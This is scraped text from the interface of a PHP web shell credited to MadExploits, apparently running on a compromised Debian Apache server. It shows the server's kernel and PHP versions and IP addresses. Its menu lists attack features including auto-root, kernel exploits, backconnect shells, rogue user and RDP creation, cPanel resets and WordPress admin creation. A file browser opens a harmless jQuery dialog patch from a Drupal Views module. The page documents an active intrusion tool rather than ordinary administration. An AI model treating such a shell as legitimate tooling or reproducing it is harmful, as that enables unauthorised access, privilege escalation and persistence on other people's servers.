Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.227.134.115
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax.js
8.78
KB
-rw-r--r--
ajax_view.js
4.93
KB
-rw-r--r--
base.js
3.01
KB
-rw-r--r--
jquery.ui.dialog.patch.js
1.13
KB
-rw-r--r--
views-admin.js
36.88
KB
-rw-r--r--
views-contextual.js
504
B
-rw-r--r--
views-list.js
633
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.ui.dialog.patch.js
/** * This is part of a patch to address a jQueryUI bug. The bug is responsible * for the inability to scroll a page when a modal dialog is active. If the content * of the dialog extends beyond the bottom of the viewport, the user is only able * to scroll with a mousewheel or up/down keyboard keys. * * @see http://bugs.jqueryui.com/ticket/4671 * @see https://bugs.webkit.org/show_bug.cgi?id=19033 * @see views_ui.module * @see js/jquery.ui.dialog.min.js * * This javascript patch overwrites the $.ui.dialog.overlay.events object to remove * the mousedown, mouseup and click events from the list of events that are bound * in $.ui.dialog.overlay.create * * The original code for this object: * $.ui.dialog.overlay.events: $.map('focus,mousedown,mouseup,keydown,keypress,click'.split(','), * function(event) { return event + '.dialog-overlay'; }).join(' '), * */ (function ($, undefined) { if ($.ui && $.ui.dialog && $.ui.dialog.overlay) { $.ui.dialog.overlay.events = $.map('focus,keydown,keypress'.split(','), function(event) { return event + '.dialog-overlay'; }).join(' '); } }(jQuery));
Close